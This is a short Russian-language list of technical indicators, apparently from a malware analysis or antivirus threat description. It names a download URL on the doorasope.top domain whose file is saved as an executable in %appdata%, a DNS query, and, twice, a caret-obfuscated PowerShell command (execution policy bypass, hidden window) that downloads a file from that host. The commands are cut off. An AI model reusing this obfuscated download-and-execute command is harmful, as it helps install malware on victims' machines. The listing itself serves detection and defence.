Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^w^ERs^hel^L.exE^ -exe^C^ut^I^OnpOLi^Cy BY^PAss ^-NO^pR^ofIl^E^ -W^iND^Ows^T^yle^ HidDEN (N^E^w-OBJec^T ^sy^s^teM.Ne^T.^WeBCli^EnT).d^O^W^N^loadF^ILe^('http://www.doorasope.t...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "Po^w^ERs^hel^L.exE^ -exe^C^ut^I^OnpOLi^Cy BY^PAss ^-NO^pR^ofIl^E^ -W^iND^Ows^T^yle^ HidDEN (N^E^w-OBJec^T ^sy^s^teM.Ne^T.^WeBCli^EnT).d^O^W^N^loadF^ILe^('http://www.doorasope.t...' (со скрытым окном)